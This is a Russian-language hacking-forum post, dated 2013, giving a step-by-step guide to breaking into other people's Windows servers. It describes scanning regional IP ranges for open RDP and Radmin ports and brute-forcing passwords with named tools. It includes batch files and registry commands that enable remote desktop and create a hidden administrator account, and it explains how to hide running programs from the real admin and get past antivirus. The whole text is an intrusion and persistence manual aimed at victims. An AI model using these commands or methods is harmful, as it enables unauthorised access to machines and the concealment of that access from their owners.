Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.
RDP - протокол удалённого рабочего стола.
Для брута RDP нам понадобитса следующие программы DuBrute RC2(сам брут)VT, vnc_scanner_GUI VT(сканер портов) и можно еще ipgeobase VT(база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими.
И так приступим.
1. Запустите ipgeobase выберите округ, регион или город, скопируйте все IP адреса в буфер.
2. Теперь запустите vnc_scanner_GUI и вставьте в самое большое поле все IP адреса.
И настроим его так:
Теперь нажимаем Start Scan и ждем окончания работы.
По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятьса все IP адреса с открытым 3389 портом.
3.Запускаем DuBrute RC2 и нажимаем Generation.
Теперь нажимаем File IP и выбираем наш IPs.txt
Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt
Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt
Нажимаем Make и можем закрывать это окно.
Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей.
Нажимаем Config и Настроим его так:
Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы.
После окончание работы все гуды сохраняютьса в файле good.txt
Вот и все на этом брут RDP закончен.
R"admin - программа для удалённого доступа.
Для ее брута нам понадобитса lamescan3_r11 VT, ipgeobase VT и клиент Р"админа radmin viewer VT
1. Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное
Настроим его так:
закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к Р"админу, и поставьте все галочки.
Вот так:
2. Запустите ipgeobase выберите округ, регион или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово.
Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.
После окончания работы можете спокойно подлючатся к хостам к которым подобран пароль.
Вот и все на этом брут Radminа закончен.
После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).
Приступим, включить RDP можно так:
-Щелкаем Правой кнопкой мышки на Мой компютер->Свойства
-Переходим на вкладку "Удалённые сеансы"
-Ставим везде галочки или с помощью батника: Оффтоп
@Echo off
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Чтобы запустить батник на компьютере у жертвы надо с помощью передачи файлов закинуть батник в недры виндовса и подключитьса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat
Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free VT и перезагрузить компьютер, запустить его можно также с использованием командной строки.
Вот и все теперь можете подключитьса к компьютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.
5. Как создать и скрыть пользователя на дедике?
1. С помощью Управления компьютером - Оффтоп
-Щелкаем Правой кнопкой мышки на Мой компьютер->Управление
-Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставьте только на 3 пункте)
Включаем cmd и создаем пользователя командами:
net user Имя Пароль/add
net localgroup Група администраторов Имя /add
net localgroup Група пользователей RDP Имя /add
net accounts /maxpwage:unlimited
3. С помощью батника который создает и сразу скрывает пользователя с экрана приветствий Оффтоп
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user Имя_пользователя Пароль /add
net localgroup %AdmGroup% Имя_пользователя /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" Имя_пользователя /add
net accounts /maxpwage:unlimited
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v Имя_пользователя /t REG_DWORD /d "00000000" /f
4. С помощью программы - DED C14 vt - она создаст и скроет пользователя.
5. Скрыть пользователя. Оффтоп
Вот мы создали пользователя теперь надо скрыть его с экрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытые в папке останавливатьса не буду надеюсь все это знают.
Чтобы скрыть пользователя в экране приветствия в ветке реестра :
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
нужно создать параметр типа DWORD с именем пользователя и значением 0.
Вот и все теперь на дедике у нас есть свой скрытый пользователь.
6. Как пользоватьса дедиком не создавая пользователя(под админом) и не быть замеченным? Оффтоп
Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz VT, PS Tray Factory VT, DelTrayIcon VT.
Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:
- Запускаем PS Tray Factory и в первых двух вкладках отмечаем приложения которые хотим скрыть и сворачиваем его (не выключаем). После этого действия пропадут окна наших программ, но останется процессы иконка PS Tray Factory.
- Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процессы PS Tray Factory и программ которые мы хотели скрыть.
- Запускаем hidetoolz и на процессах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.
Если вы все сделали правильно то теперь наши программы работают на учетке админа полностью скрыто и он об этом даже не подозревает.
Теперь чтобы увидеть окна ваших программ включите hidetoolz и сделайте все процессы видимыми, убейте в диспетчере задач процесс PS Tray Factory, система немного залагает и покажет вам окна всех программ которые вы скрыли.
7. Что делать если антивирус на дедике удаляет ваши программы? Оффтоп
Объяснять для каждого антивируса очень долго но расскажу в общем виде(если что поищите в гугле).
Нужно создать папку где-то в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.
Если антивирус не разрешает изменений и просит пароль можем попытаться выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.
Как обойти новые локеры я честно говоря не знаю, но можно попытаться вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процесс локера, или вызвать командную строку с помощью [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процесс локера, можно попытатса переключится на другое окно с помощью [Alt]+[Tab] или если есть доступ до файлов с помощью тех же команд что написал выше убить процесс батником.
Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроется окно "Запуск программы" в нем пишем mstsc и нажимаем OK,
откроется окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ип адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"
и в поле "Пользователь" пишем имя учетки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,
появится еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике, чтобы зайти на него еще раз вам просто будет нужно
выбрать ип дедика и нажать Подключить и ваш компьютер автоматически введет логин и пароль к пользователю.
Когда вы это все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.
10. Как подключить свой локальный диск и буфер обмена к дедику? Оффтоп
Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Локальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычно диск C ) то можно будет передавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь этим потому что ваш локальный диск будет доступен всем пользователям дедика т.е. админ увидит что подключился ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоваться дедиком дальше.
11. Автоматически запустить свою прогу при входе на дедик. Оффтоп
Вы можете запустить свою программу при подключении (обычно программы для сбора информации) для этого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.
Источник - юхак
Последний раз редактировалось Miss; 07.02.2013 в 11:11.
Я не оказываю услуги гаранта!
База данных кидал: blacklist.rf-cheats.ru
Обязательно проверяйте человека через чёрный список прежде чем совершать с ним сделку.
